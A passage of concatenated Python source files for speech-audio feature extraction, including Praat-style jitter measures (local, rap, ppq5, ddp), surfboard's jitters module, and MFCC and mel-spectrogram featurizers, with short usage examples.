T_0 = periods_interp[ t_index ]
frame_start = t - 1.25 * T_0
frame_stop = t - 0.80 * T_0
T_0 = periods_interp[ midpoint_index ]
frame_start = midpoint - T_0
frame_stop = midpoint + T_0
#finding points by now looking to the right of the center of the
#voiced interval
while frame_stop < stop :
#out of all given time points in signal, find index of closest to
#start and stop
frame_start_index = np.argmin( abs( total_time - frame_start ) )
frame_stop_index = np.argmin( abs( total_time - frame_stop ) )
frame = signal[ frame_start_index : frame_stop_index ]
if include_max and include_min:
p_index = np.argmax( abs( frame ) ) + frame_start_index
elif include_max:
p_index = np.argmax( frame ) + frame_start_index
else:
p_index = np.argmin( frame ) + frame_start_index
if abs( signal[ p_index ] ) > .02333 * global_peak:
points.append( total_time[ p_index ] )
t = total_time[ p_index ]
t_index = np.argmin( abs( v_time - t ) )
T_0 = periods_interp[ t_index ]
frame_start = t + 0.80 * T_0
frame_stop = t + 1.25 * T_0
#returning an ordered array of points with any duplicates removed
return np.array( sorted( list( set( points ) ) ) )
def get_Jitter( signal, rate, period_floor = .0001, period_ceiling = .02,
max_period_factor = 1.3 ):
"""
Compute Jitter.
    Jitter is the measurement of random perturbations in period length. For the
    most accurate jitter measurements, calculations are typically performed on
    long sustained vowels. This algorithm calculates 5 different types of jitter
    for all voiced intervals. Each type of jitter describes different
    characteristics of the period perturbations. The 5 types of jitter
    calculated are absolute jitter, relative jitter, relative average
    perturbation ( rap ), the 5-point period perturbation quotient ( ppq5 ), and
    the difference of differences of periods ( ddp ).\n
Absolute jitter is defined as the cycle-to-cycle variation of
fundamental frequency, or in other words, the average absolute difference
between consecutive periods.
.. math::
\\frac{1}{N-1}\sum_{i=1}^{N-1}|T_i-T_{i-1}|
Relative jitter is defined as the average absolute difference between
consecutive periods ( absolute jitter ), divided by the average period.
.. math::
\\frac{\\frac{1}{N-1}\sum_{i=1}^{N-1}|T_i-T_{i-1}|}{\\frac{1}{N}\sum_{i=1}^N T_i}
Relative average perturbation is defined as the average absolute difference
between a period and the average of it and its two neighbors divided by the
average period.
.. math::
\\frac{\\frac{1}{N-1}\sum_{i=1}^{N-1}|T_i-(\\frac{1}{3}\sum_{n=i-1}^{i+1}T_n)|}{\\frac{1}{N}\sum_{i=1}^N T_i}
    The 5-point period perturbation quotient is defined as the average absolute
difference between a period and the average of it and its 4 closest neighbors
divided by the average period.
.. math::
\\frac{\\frac{1}{N-1}\sum_{i=2}^{N-2}|T_i-(\\frac{1}{5}\sum_{n=i-2}^{i+2}T_n)|}{\\frac{1}{N}\sum_{i=1}^N T_i}
The difference of differences of periods is defined as the relative mean
absolute second-order difference of periods, which is equivalent to 3 times
rap.
.. math::
\\frac{\\frac{1}{N-2}\sum_{i=2}^{N-1}|(T_{i+1}-T_i)-(T_i-T_{i-1})|}{\\frac{1}{N}\sum_{i=1}^{N}T_i}
After each type of jitter has been calculated the values are
returned in a dictionary.
.. warning::
This algorithm has 4.2% relative error when compared to Praat's values.
This algorithm is adapted from:
http://www.lsi.upc.edu/~nlp/papers/far_jit_07.pdf
and from:
http://ac.els-cdn.com/S2212017313002788/1-s2.0-S2212017313002788-main.pdf?_tid=0c860a76-7eda-11e7-a827-00000aab0f02&acdnat=1502486243_009951b8dc70e35597f4cd19f8e05930
and from:
https://github.com/praat/praat/blob/master/fon/VoiceAnalysis.cpp
.. note::
        Significant differences can occur in jitter and shimmer measurements
        between different speaking styles; these differences make it possible to
        use jitter as a feature for speaker recognition ( referenced above ).
Args:
signal ( numpy.ndarray ): This is the signal the jitter will be calculated from.
rate ( int ): This is the number of samples taken per second.
period_floor ( float ): ( optional, default value: .0001 ) This is the shortest possible interval that will be used in the computation of jitter, in seconds. If an interval is shorter than this, it will be ignored in the computation of jitter ( the previous and next intervals will not be regarded as consecutive ).
period_ceiling ( float ): ( optional, default value: .02 ) This is the longest possible interval that will be used in the computation of jitter, in seconds. If an interval is longer than this, it will be ignored in the computation of jitter ( the previous and next intervals will not be regarded as consecutive ).
max_period_factor ( float ): ( optional, default value: 1.3 ) This is the largest possible difference between consecutive intervals that will be used in the computation of jitter. If the ratio of the durations of two consecutive intervals is greater than this, this pair of intervals will be ignored in the computation of jitter ( each of the intervals could still take part in the computation of jitter, in a comparison with its neighbor on the other side ).
Returns:
dict: a dictionary with keys: 'local', 'local, absolute', 'rap',
'ppq5', and 'ddp'. The values correspond to each type of jitter.\n
local jitter is expressed as a ratio of mean absolute period variation
to the mean period. \n
local absolute jitter is given in seconds.\n
rap is expressed as a ratio of the mean absolute difference between a
period and the mean of its 2 neighbors to the mean period.\n
ppq5 is expressed as a ratio of the mean absolute difference between a
period and the mean of its 4 neighbors to the mean period.\n
ddp is expressed as a ratio of the mean absolute second-order
difference to the mean period.
Example:
In the example below a synthesized signal is used to demonstrate random
perturbations in periods, and how get_Jitter responds.
>>> import numpy as np
>>> domain = np.linspace( 0, 6, 300000 )
>>> y = lambda x:( 1 - .3 * np.sin( 2 * np.pi * 140 * x ) ) * np.sin(
2 * np.pi * 140 * x )
>>> signal = y( domain ) + .2 * np.random.random( 300000 )
>>> rate = 50000
>>> get_Jitter( signal, rate )
{ 'ddp': 0.047411037373434134,
'local': 0.02581897560637415,
'local, absolute': 0.00018442618908563846,
'ppq5': 0.014805010237029443,
'rap': 0.015803679124478043 }
>>> get_Jitter( signal, rate, period_floor = .001,
period_ceiling = .01, max_period_factor = 1.05 )
{ 'ddp': 0.03264516540374475,
'local': 0.019927260366800197,
'local, absolute': 0.00014233584195389132,
'ppq5': 0.011472274162612033,
'rap': 0.01088172180124825 }
>>> y = lambda x:( 1 - .3 * np.sin( 2 * np.pi * 140 * x ) ) * np.sin(
2 * np.pi * 140 * x )
>>> signal = y( domain )
>>> get_Jitter( signal, rate )
{ 'ddp': 0.0015827628114371581,
'local': 0.00079043477724730755,
'local, absolute': 5.6459437833161522e-06,
'ppq5': 0.00063462518488944565,
'rap': 0.00052758760381238598 }
"""
pulses = get_Pulses( signal, rate )
periods = np.diff( pulses )
min_period_factor = 1.0 / max_period_factor
#finding local, absolute
#described at:
#http://www.fon.hum.uva.nl/praat/manual/PointProcess__Get_jitter__local__absolute____.html
sum_total = 0
num_periods = len( pulses ) - 1
for i in range( len( periods ) - 1 ):
p1, p2 = periods[ i ], periods[ i + 1 ]
ratio = p2 / p1
if (ratio < max_period_factor and ratio > min_period_factor and
p1 < period_ceiling and p1 > period_floor and
p2 < period_ceiling and p2 > period_floor ):
sum_total += abs( periods[ i + 1 ] - periods[ i ] )
else: num_periods -= 1
absolute = sum_total / ( num_periods - 1 )
#finding local,
#described at:
#http://www.fon.hum.uva.nl/praat/manual/PointProcess__Get_jitter__local____.html
sum_total = 0
num_periods = 0
#duplicating edges so there is no need to test edge cases
periods = np.hstack( ( periods[ 0 ], periods, periods[ -1 ] ) )
for i in range( len( periods ) - 2):
p1, p2, p3 = periods[ i ], periods[ i + 1 ], periods[ i + 2 ]
ratio_1, ratio_2 = p1 / p2, p2 / p3
if (ratio_1 < max_period_factor and ratio_1 > min_period_factor and
ratio_2 < max_period_factor and ratio_2 > min_period_factor and
p2 < period_ceiling and p2 > period_floor ):
sum_total += p2
num_periods += 1
#removing duplicated edges
periods = periods[ 1 : -1 ]
avg_period = sum_total / ( num_periods )
relative = absolute / avg_period
#finding rap
#described at:
#http://www.fon.hum.uva.nl/praat/manual/PointProcess__Get_jitter__rap____.html
sum_total = 0
num_periods = 0
for i in range( len( periods ) - 2 ):
p1, p2, p3 = periods[ i ], periods[ i + 1 ], periods[ i + 2 ]
ratio_1, ratio_2 = p1 / p2, p2 / p3
if (ratio_1 < max_period_factor and ratio_1 > min_period_factor and
ratio_2 < max_period_factor and ratio_2 > min_period_factor and
p1 < period_ceiling and p1 > period_floor and
p2 < period_ceiling and p2 > period_floor and
p3 < period_ceiling and p3 > period_floor ):
sum_total += abs( p2 - ( p1 + p2 + p3 ) / 3.0 )
num_periods += 1
rap = ( sum_total / num_periods ) / avg_period
#finding ppq5
#described at:
#http://www.fon.hum.uva.nl/praat/manual/PointProcess__Get_jitter__ppq5____.html
sum_total = 0
num_periods = 0
for i in range( len( periods ) - 4 ):
p1, p2, p3 = periods[ i ], periods[ i + 1 ], periods[ i + 2 ]
p4, p5 = periods[ i + 3 ], periods[ i + 4 ]
ratio_1, ratio_2, ratio_3, ratio_4 = p1 / p2, p2 / p3, p3 / p4, p4 / p5
if (ratio_1 < max_period_factor and ratio_1 > min_period_factor and
ratio_2 < max_period_factor and ratio_2 > min_period_factor and
ratio_3 < max_period_factor and ratio_3 > min_period_factor and
ratio_4 < max_period_factor and ratio_4 > min_period_factor and
p1 < period_ceiling and p1 > period_floor and
p2 < period_ceiling and p2 > period_floor and
p3 < period_ceiling and p3 > period_floor and
p4 < period_ceiling and p4 > period_floor and
p5 < period_ceiling and p5 > period_floor ):
sum_total += abs( p3 - ( p1 + p2 + p3 +p4 + p5 ) / 5.0 )
num_periods += 1
ppq5 = ( sum_total / num_periods ) / avg_period
#Praat calculates ddp by multiplying rap by 3
#described at:
#http://www.fon.hum.uva.nl/praat/manual/PointProcess__Get_jitter__ddp____.html
return { 'local' : relative, 'local, absolute' : absolute, 'rap' : rap,
'ppq5' : ppq5, 'ddp' : 3 * rap }
```
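Taken together, `get_F_0`, `get_HNR`, `get_Pulses`, and `get_Jitter` above form a small voice-quality pipeline. The sketch below shows one plausible way to call them on a synthesized amplitude-modulated tone, mirroring the docstring examples; it assumes numpy and peakutils are installed and that the functions above are in scope (e.g. imported from this module).

```python
import numpy as np

# assumes get_F_0, get_HNR, and get_Jitter from the module above are in scope
rate = 50000
domain = np.linspace(0, 6, 6 * rate)
signal = (1 + .3 * np.sin(2 * np.pi * 140 * domain)) * np.sin(2 * np.pi * 140 * domain)

median_f0 = get_F_0(signal, rate)[0]   # median fundamental frequency in Hz
hnr = get_HNR(signal, rate)            # mean harmonics-to-noise ratio in dB
jitter = get_Jitter(signal, rate)      # dict with 'local', 'local, absolute', 'rap', 'ppq5', 'ddp'

print(median_f0, hnr, jitter['local'])
```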
#### File: surfboard/surfboard/jitters.py
```python
import numpy as np
from .utils import (
shifted_sequence,
)
def validate_frequencies(frequencies, p_floor, p_ceil, max_p_factor):
"""Given a sequence of frequencies, [f1, f2, ..., fn], a minimum period,
maximum period, and maximum period factor, first remove all frequencies computed as 0.
Then, if periods are the inverse frequencies, this function returns
True if the sequence of periods satisfies the conditions, otherwise
returns False. In order to satisfy the maximum period factor, the periods
have to satisfy pi / pi+1 < max_p_factor and pi+1 / pi < max_p_factor.
Args:
frequencies (sequence, eg list, of floats): sequence of frequencies == 1 / period.
p_floor (float): minimum acceptable period.
p_ceil (float): maximum acceptable period.
max_p_factor (float): value to use for the period factor principle
Returns:
bool: True if the conditions are met, False otherwise.
"""
for freq in frequencies:
if freq == 0:
return False
periods = [1 / f for f in frequencies]
for period in periods:
if period < p_floor or period > p_ceil:
return False
if len(periods) > 1 and max_p_factor is not None:
for period1, period2 in zip(periods[:-1], periods[1:]):
if period1 / period2 > max_p_factor or period2 / period1 > max_p_factor:
return False
return True
def get_mean_period(frequencies, p_floor, p_ceil, max_p_factor):
"""Given a sequence of frequencies, passes these through the validation phase,
then computes the mean of the remaining periods. Note period = 1/f.
Args:
frequencies (sequence, eg list, of floats): sequence of frequencies
p_floor (float): minimum acceptable period.
p_ceil (float): maximum acceptable period.
max_p_factor (float): value to use for the period factor principle
Returns:
float: The mean of the acceptable periods.
"""
cumsum = 0
counter = 0
for freq in frequencies:
if validate_frequencies([freq], p_floor, p_ceil, max_p_factor):
cumsum += 1 / freq
counter += 1
mean_period = cumsum / counter if counter != 0 else None
return mean_period
def get_local_absolute_jitter(frequencies, p_floor, p_ceil, max_p_factor):
"""Given a sequence of frequencies, and some period conditions,
compute the local absolute jitter, as per
https://royalsocietypublishing.org/action/downloadSupplement?doi=10.1098%2Frsif.2010.0456&file=rsif20100456supp1.pdf
Args:
frequencies (sequence, eg list, of floats): sequence of estimated frequencies
p_floor (float): minimum acceptable period.
p_ceil (float): maximum acceptable period.
max_p_factor (float): value to use for the period factor principle
Returns:
float: the local absolute jitter.
"""
cumsum = 0
counter = 0
for pair in shifted_sequence(frequencies, 2):
freq1, freq2 = pair
if validate_frequencies([freq1, freq2], p_floor, p_ceil, max_p_factor):
counter += 1
cumsum += np.abs((1 / freq1) - (1 / freq2))
return cumsum / counter if counter != 0 else None
def get_local_jitter(frequencies, p_floor, p_ceil, max_p_factor):
"""Given a sequence of frequencies, and some period conditions, compute the local
jitter, as per https://royalsocietypublishing.org/action/downloadSupplement?doi=10.1098%2Frsif.2010.0456&file=rsif20100456supp1.pdf
Args:
frequencies (sequence, eg list, of floats): sequence of estimated frequencies
p_floor (float): minimum acceptable period.
p_ceil (float): maximum acceptable period.
max_p_factor (float): value to use for the period factor principle
Returns:
float: the local jitter.
"""
mean_period = get_mean_period(frequencies, p_floor, p_ceil, max_p_factor)
local_absolute_jitter = get_local_absolute_jitter(frequencies, p_floor, p_ceil, max_p_factor)
if mean_period is not None and local_absolute_jitter is not None:
return local_absolute_jitter / mean_period if mean_period != 0 else None
return None
def get_rap_jitter(frequencies, p_floor, p_ceil, max_p_factor):
"""Given a sequence of frequencies, and some period conditions,
compute the rap jitter, as per
https://royalsocietypublishing.org/action/downloadSupplement?doi=10.1098%2Frsif.2010.0456&file=rsif20100456supp1.pdf
Args:
frequencies (sequence, eg list, of floats): sequence of estimated frequencies
p_floor (float): minimum acceptable period.
p_ceil (float): maximum acceptable period.
max_p_factor (float): value to use for the period factor principle
Returns:
float: the rap jitter.
"""
counter = 0
cumsum = 0
mean_period = get_mean_period(frequencies, p_floor, p_ceil, max_p_factor)
for freq1, freq2, freq3 in shifted_sequence(frequencies, 3):
if validate_frequencies([freq1, freq2, freq3], p_floor, p_ceil, max_p_factor):
cumsum += np.abs(1 / freq2 - (1 / freq1 + 1 / freq2 + 1 / freq3) / 3)
counter += 1
if counter != 0:
rap_jitter = (cumsum / counter) / mean_period if mean_period != 0 else None
return rap_jitter
return None
def get_ppq5_jitter(frequencies, p_floor, p_ceil, max_p_factor):
"""Given a sequence of frequencies, and some period conditions,
compute the ppq5 jitter, as per
https://royalsocietypublishing.org/action/downloadSupplement?doi=10.1098%2Frsif.2010.0456&file=rsif20100456supp1.pdf
Args:
frequencies (sequence, eg list, of floats): sequence of estimated frequencies
p_floor (float): minimum acceptable period.
p_ceil (float): maximum acceptable period.
max_p_factor (float): value to use for the period factor principle
Returns:
float: the ppq5 jitter.
"""
counter = 0
cumsum = 0
mean_period = get_mean_period(frequencies, p_floor, p_ceil, max_p_factor)
for freq1, freq2, freq3, freq4, freq5 in shifted_sequence(frequencies, 5):
if validate_frequencies([freq1, freq2, freq3, freq4, freq5], p_floor, p_ceil, max_p_factor):
counter += 1
cumsum += np.abs(1 / freq3 - (1 / freq1 + 1 / freq2 + 1 / freq3 + 1 / freq4 + 1 / freq5) / 5)
if counter != 0:
ppq5_jitter = (cumsum / counter) / mean_period if mean_period != 0 else None
return ppq5_jitter
return None
def get_ddp_jitter(frequencies, p_floor, p_ceil, max_p_factor):
"""Given a sequence of frequencies, and some period conditions,
compute the ddp jitter, as per
http://www.fon.hum.uva.nl/praat/manual/PointProcess__Get_jitter__ddp____.html
Args:
frequencies (sequence, eg list, of floats): sequence of estimated frequencies
p_floor (float): minimum acceptable period.
p_ceil (float): maximum acceptable period.
max_p_factor (float): value to use for the period factor principle
Returns:
float: the ddp jitter.
"""
counter = 0
cumsum = 0
mean_period = get_mean_period(frequencies, p_floor, p_ceil, max_p_factor)
for freq1, freq2, freq3 in shifted_sequence(frequencies, 3):
if validate_frequencies([freq1, freq2, freq3], p_floor, p_ceil, max_p_factor):
counter += 1
cumsum += np.abs((1 / freq3 - 1 / freq2) - (1 / freq2 - 1 / freq1))
if counter != 0:
ddp_jitter = (cumsum / counter) / mean_period if mean_period != 0 else None
return ddp_jitter
return None
def get_jitters(f0_contour, p_floor=0.0001, p_ceil=0.02, max_p_factor=1.3):
"""Compute the jitters mathematically, according to certain conditions
given by p_floor, p_ceil and max_p_factor.
Args:
f0_contour (np.array [T / hop_length, ]): the fundamental frequency contour.
p_floor (float): minimum acceptable period.
p_ceil (float): maximum acceptable period.
max_p_factor (float): value to use for the period factor principle
Returns:
dict: Dictionary mapping strings to floats, with keys
"localJitter", "localabsoluteJitter", "rapJitter", "ppq5Jitter",
"ddpJitter"
"""
local_absolute_jitter = get_local_absolute_jitter(f0_contour, p_floor, p_ceil, max_p_factor)
local_jitter = get_local_jitter(f0_contour, p_floor, p_ceil, max_p_factor)
rap_jitter = get_rap_jitter(f0_contour, p_floor, p_ceil, max_p_factor)
ppq5_jitter = get_ppq5_jitter(f0_contour, p_floor, p_ceil, max_p_factor)
ddp_jitter = get_ddp_jitter(f0_contour, p_floor, p_ceil, max_p_factor)
jitters_dict = {
"localJitter": local_jitter,
"localabsoluteJitter": local_absolute_jitter,
"rapJitter": rap_jitter,
"ppq5Jitter": ppq5_jitter,
"ddpJitter": ddp_jitter,
}
return jitters_dict
```
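A short usage sketch for `get_jitters` above. The F0 contour here is synthetic (roughly 140 Hz with small random cycle-to-cycle perturbations), just to show the expected input shape and output keys; it assumes the surfboard package is installed so that the import resolves.

```python
import numpy as np
from surfboard.jitters import get_jitters  # assumes the surfboard package is installed

# synthetic F0 contour: ~140 Hz with small random cycle-to-cycle perturbations
f0_contour = 140.0 + np.random.normal(0, 1.5, size=500)

jitters = get_jitters(f0_contour, p_floor=0.0001, p_ceil=0.02, max_p_factor=1.3)
print(jitters["localJitter"], jitters["rapJitter"], jitters["ppq5Jitter"])
```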
#### File: features/audio_features/pyaudiolex_features.py
```python
import argparse, json, os, sys
sys.path.append(os.getcwd()+'/helpers/pyAudioLex')
from helpers.pyAudioLex import audio_ as audio
import pandas as pd
from datetime import datetime
def pyaudiolex_featurize(filename):
# features
results = audio.audio_featurize(filename)
labels=list(results)
features=list(results.values())
# combine all features and values into proper format for Allie
new_features=list()
new_labels=list()
for i in range(len(labels)):
# print(labels[i])
for j in range(len(features[i])):
new_labels.append(labels[i]+'_window_'+str(j))
new_features.append(features[i][j])
features=new_features
labels=new_labels
return features, labels
```
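A minimal usage sketch for `pyaudiolex_featurize` above; it assumes the project's `helpers/pyAudioLex` package is on the path (as arranged by the `sys.path.append` call in the file) and `'sample.wav'` is a placeholder file name.

```python
# minimal usage sketch; 'sample.wav' is a placeholder path
features, labels = pyaudiolex_featurize('sample.wav')
print(len(features), labels[:3])  # one value per feature window; each label ends in '_window_<index>'
```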
#### File: features/audio_features/spectrogram_features.py
```python
import os
import librosa
import numpy as np
from sklearn.decomposition import PCA
def spectrogram_featurize(file_path):
n_fft = 1024
sr = 32000
mono = True
log_spec = False
n_mels = 128
hop_length = 192
fmax = None
if mono:
sig, sr = librosa.load(file_path, sr=sr, mono=True)
sig = sig[np.newaxis]
else:
sig, sr = librosa.load(file_path, sr=sr, mono=False)
spectrograms = []
for y in sig:
# compute stft
stft = librosa.stft(y, n_fft=n_fft, hop_length=hop_length, win_length=None, window='hann', center=True, pad_mode='reflect')
        # keep only amplitudes
stft = np.abs(stft)
# log spectrogram
stft = np.log10(stft + 1)
# apply mel filterbank
spectrogram = librosa.feature.melspectrogram(S=stft, sr=sr, n_mels=n_mels, fmax=fmax)
# keep spectrogram
spectrograms.append(np.asarray(spectrogram))
labels=list()
mean_features=np.mean(np.array(spectrograms), axis=2)[0]
for i in range(len(mean_features)):
labels.append('log_spectrogram_mean_feature_%s'%(str(i+1)))
std_features=np.std(np.array(spectrograms), axis=2)[0]
for i in range(len(std_features)):
labels.append('log_spectrogram_std_feature_%s'%(str(i+1)))
# np.ndarray.flatten
features=np.append(mean_features, std_features)
return features, labels
```
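A quick usage sketch for `spectrogram_featurize` above; the file name is a placeholder, and librosa, numpy, and scikit-learn need to be installed for the module to import.

```python
# minimal usage sketch; 'speech_sample.wav' is a placeholder path
features, labels = spectrogram_featurize('speech_sample.wav')
print(len(features), len(labels))  # 256 values: mean and std features for 128 mel bands
print(labels[0], features[0])
```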
#### File: features/audio_features/standard_features.py
```python
import librosa, os, uuid
import numpy as np
from pydub import AudioSegment
def audio_featurize(wavfile):
#initialize features
hop_length = 512
n_fft=2048
#load file
y, sr = librosa.load(wavfile)
#extract mfcc coefficients
mfcc = librosa.feature.mfcc(y=y, sr=sr, hop_length=hop_length, n_mfcc=13)
mfcc_delta = librosa.feature.delta(mfcc)
#extract mean, standard deviation, min, and max value in mfcc frame, do this across all mfccs
mfcc_features=np.array([np.mean(mfcc[0]),np.std(mfcc[0]),np.amin(mfcc[0]),np.amax(mfcc[0]),
np.mean(mfcc[1]),np.std(mfcc[1]),np.amin(mfcc[1]),np.amax(mfcc[1]),
np.mean(mfcc[2]),np.std(mfcc[2]),np.amin(mfcc[2]),np.amax(mfcc[2]),
np.mean(mfcc[3]),np.std(mfcc[3]),np.amin(mfcc[3]),np.amax(mfcc[3]),
np.mean(mfcc[4]),np.std(mfcc[4]),np.amin(mfcc[4]),np.amax(mfcc[4]),
np.mean(mfcc[5]),np.std(mfcc[5]),np.amin(mfcc[5]),np.amax(mfcc[5]),
np.mean(mfcc[6]),np.std(mfcc[6]),np.amin(mfcc[6]),np.amax(mfcc[6]),
np.mean(mfcc[7]),np.std(mfcc[7]),np.amin(mfcc[7]),np.amax(mfcc[7]),
np.mean(mfcc[8]),np.std(mfcc[8]),np.amin(mfcc[8]),np.amax(mfcc[8]),
np.mean(mfcc[9]),np.std(mfcc[9]),np.amin(mfcc[9]),np.amax(mfcc[9]),
np.mean(mfcc[10]),np.std(mfcc[10]),np.amin(mfcc[10]),np.amax(mfcc[10]),
np.mean(mfcc[11]),np.std(mfcc[11]),np.amin(mfcc[11]),np.amax(mfcc[11]),
np.mean(mfcc[12]),np.std(mfcc[12]),np.amin(mfcc[12]),np.amax(mfcc[12]),
np.mean(mfcc_delta[0]),np.std(mfcc_delta[0]),np.amin(mfcc_delta[0]),np.amax(mfcc_delta[0]),
np.mean(mfcc_delta[1]),np.std(mfcc_delta[1]),np.amin(mfcc_delta[1]),np.amax(mfcc_delta[1]),
np.mean(mfcc_delta[2]),np.std(mfcc_delta[2]),np.amin(mfcc_delta[2]),np.amax(mfcc_delta[2]),
np.mean(mfcc_delta[3]),np.std(mfcc_delta[3]),np.amin(mfcc_delta[3]),np.amax(mfcc_delta[3]),
np.mean(mfcc_delta[4]),np.std(mfcc_delta[4]),np.amin(mfcc_delta[4]),np.amax(mfcc_delta[4]),
np.mean(mfcc_delta[5]),np.std(mfcc_delta[5]),np.amin(mfcc_delta[5]),np.amax(mfcc_delta[5]),
np.mean(mfcc_delta[6]),np.std(mfcc_delta[6]),np.amin(mfcc_delta[6]),np.amax(mfcc_delta[6]),
np.mean(mfcc_delta[7]),np.std(mfcc_delta[7]),np.amin(mfcc_delta[7]),np.amax(mfcc_delta[7]),
np.mean(mfcc_delta[8]),np.std(mfcc_delta[8]),np.amin(mfcc_delta[8]),np.amax(mfcc_delta[8]),
np.mean(mfcc_delta[9]),np.std(mfcc_delta[9]),np.amin(mfcc_delta[9]),np.amax(mfcc_delta[9]),
np.mean(mfcc_delta[10]),np.std(mfcc_delta[10]),np.amin(mfcc_delta[10]),np.amax(mfcc_delta[10]),
np.mean(mfcc_delta[11]),np.std(mfcc_delta[11]),np.amin(mfcc_delta[11]),np.amax(mfcc_delta[11]),
np.mean(mfcc_delta[12]),np.std(mfcc_delta[12]),np.amin(mfcc_delta[12]),np.amax(mfcc_delta[12])])
return mfcc_features
def exportfile(newAudio,time1,time2,filename,i):
#Exports to a wav file in the current path.
newAudio2 = newAudio[time1:time2]
g=os.listdir()
if filename[0:-4]+'_'+str(i)+'.wav' in g:
filename2=str(uuid.uuid4())+'_segment'+'.wav'
print('making %s'%(filename2))
newAudio2.export(filename2,format="wav")
else:
filename2=str(uuid.uuid4())+'.wav'
print('making %s'%(filename2))
newAudio2.export(filename2, format="wav")
return filename2
def audio_time_features(filename):
#recommend >0.50 seconds for timesplit
timesplit=0.50
hop_length = 512
n_fft=2048
y, sr = librosa.load(filename)
duration=float(librosa.core.get_duration(y))
#Now splice an audio signal into individual elements of 100 ms and extract
#all these features per 100 ms
segnum=round(duration/timesplit)
deltat=duration/segnum
timesegment=list()
time=0
for i in range(segnum):
#milliseconds
timesegment.append(time)
time=time+deltat*1000
if filename[-4:]=='.wav':
newAudio = AudioSegment.from_wav(filename)
elif filename[-4:]=='.mp3':
newAudio = AudioSegment.from_mp3(filename)
filelist=list()
for i in range(len(timesegment)-1):
filename=exportfile(newAudio,timesegment[i],timesegment[i+1],filename,i)
filelist.append(filename)
    # running total of the 104 features returned by audio_featurize
    featureslist = np.zeros(104)
    # featurize each ~500 ms segment saved in the current folder ( delete after )
    for j in range(len(filelist)):
        try:
            features = audio_featurize(filelist[j])
            featureslist = featureslist + features
            os.remove(filelist[j])
        except:
            # skip any segment that fails to featurize
            print('error splicing')
            os.remove(filelist[j])
# now scale the featureslist array by the length to get mean in each category
featureslist=featureslist/segnum
return featureslist
def standard_featurize(filename):
features=np.append(audio_featurize(filename), audio_time_features(filename))
# labels
labels=['mfcc_1_mean_20ms','mfcc_1_std_20ms', 'mfcc_1_min_20ms', 'mfcc_1_max_20ms',
'mfcc_2_mean_20ms','mfcc_2_std_20ms', 'mfcc_2_min_20ms', 'mfcc_2_max_20ms',
'mfcc_3_mean_20ms','mfcc_3_std_20ms', 'mfcc_3_min_20ms', 'mfcc_3_max_20ms',
'mfcc_4_mean_20ms','mfcc_4_std_20ms', 'mfcc_4_min_20ms', 'mfcc_4_max_20ms',
'mfcc_5_mean_20ms','mfcc_5_std_20ms', 'mfcc_5_min_20ms', 'mfcc_5_max_20ms',
'mfcc_6_mean_20ms','mfcc_6_std_20ms', 'mfcc_6_min_20ms', 'mfcc_6_max_20ms',
'mfcc_7_mean_20ms','mfcc_7_std_20ms', 'mfcc_7_min_20ms', 'mfcc_7_max_20ms',
'mfcc_8_mean_20ms','mfcc_8_std_20ms', 'mfcc_8_min_20ms', 'mfcc_8_max_20ms',
'mfcc_9_mean_20ms','mfcc_9_std_20ms', 'mfcc_9_min_20ms', 'mfcc_9_max_20ms',
'mfcc_10_mean_20ms','mfcc_10_std_20ms', 'mfcc_10_min_20ms', 'mfcc_10_max_20ms',
'mfcc_11_mean_20ms','mfcc_11_std_20ms', 'mfcc_11_min_20ms', 'mfcc_11_max_20ms',
'mfcc_12_mean_20ms','mfcc_12_std_20ms', 'mfcc_12_min_20ms', 'mfcc_12_max_20ms',
'mfcc_13_mean_20ms','mfcc_13_std_20ms', 'mfcc_13_min_20ms', 'mfcc_13_max_20ms',
'mfcc_1_delta_mean_20ms','mfcc_1_delta_std_20ms', 'mfcc_1_delta_min_20ms', 'mfcc_1_delta_max_20ms',
'mfcc_2_delta_mean_20ms','mfcc_2_delta_std_20ms', 'mfcc_2_delta_min_20ms', 'mfcc_2_delta_max_20ms',
'mfcc_3_delta_mean_20ms','mfcc_3_delta_std_20ms', 'mfcc_3_delta_min_20ms', 'mfcc_3_delta_max_20ms',
'mfcc_4_delta_mean_20ms','mfcc_4_delta_std_20ms', 'mfcc_4_delta_min_20ms', 'mfcc_4_delta_max_20ms',
'mfcc_5_delta_mean_20ms','mfcc_5_delta_std_20ms', 'mfcc_5_delta_min_20ms', 'mfcc_5_delta_max_20ms',
'mfcc_6_delta_mean_20ms','mfcc_6_delta_std_20ms', 'mfcc_6_delta_min_20ms', 'mfcc_6_delta_max_20ms',
'mfcc_7_delta_mean_20ms','mfcc_7_delta_std_20ms', 'mfcc_7_delta_min_20ms', 'mfcc_7_delta_max_20ms',
'mfcc_8_delta_mean_20ms','mfcc_8_delta_std_20ms', 'mfcc_8_delta_min_20ms', 'mfcc_8_delta_max_20ms',
'mfcc_9_delta_mean_20ms','mfcc_9_delta_std_20ms', 'mfcc_9_delta_min_20ms', 'mfcc_9_delta_max_20ms',
'mfcc_10_delta_mean_20ms','mfcc_10_delta_std_20ms', 'mfcc_10_delta_min_20ms', 'mfcc_10_delta_max_20ms',
'mfcc_11_delta_mean_20ms','mfcc_11_delta_std_20ms', 'mfcc_11_delta_min_20ms', 'mfcc_11_delta_max_20ms',
'mfcc_12_delta_mean_20ms','mfcc_12_delta_std_20ms', 'mfcc_12_delta_min_20ms', 'mfcc_12_delta_max_20ms',
'mfcc_13_delta_mean_20ms','mfcc_13_delta_std_20ms', 'mfcc_13_delta_min_20ms', 'mfcc_13_delta_max_20ms',
'mfcc_1_mean_500ms','mfcc_1_std_500ms', 'mfcc_1_min_500ms', 'mfcc_1_max_500ms',
'mfcc_2_mean_500ms','mfcc_2_std_500ms', 'mfcc_2_min_500ms', 'mfcc_2_max_500ms',
'mfcc_3_mean_500ms','mfcc_3_std_500ms', 'mfcc_3_min_500ms', 'mfcc_3_max_500ms',
'mfcc_4_mean_500ms','mfcc_4_std_500ms', 'mfcc_4_min_500ms', 'mfcc_4_max_500ms',
'mfcc_5_mean_500ms','mfcc_5_std_500ms', 'mfcc_5_min_500ms', 'mfcc_5_max_500ms',
'mfcc_6_mean_500ms','mfcc_6_std_500ms', 'mfcc_6_min_500ms', 'mfcc_6_max_500ms',
'mfcc_7_mean_500ms','mfcc_7_std_500ms', 'mfcc_7_min_500ms', 'mfcc_7_max_500ms',
'mfcc_8_mean_500ms','mfcc_8_std_500ms', 'mfcc_8_min_500ms', 'mfcc_8_max_500ms',
'mfcc_9_mean_500ms','mfcc_9_std_500ms', 'mfcc_9_min_500ms', 'mfcc_9_max_500ms',
'mfcc_10_mean_500ms','mfcc_10_std_500ms', 'mfcc_10_min_500ms', 'mfcc_10_max_500ms',
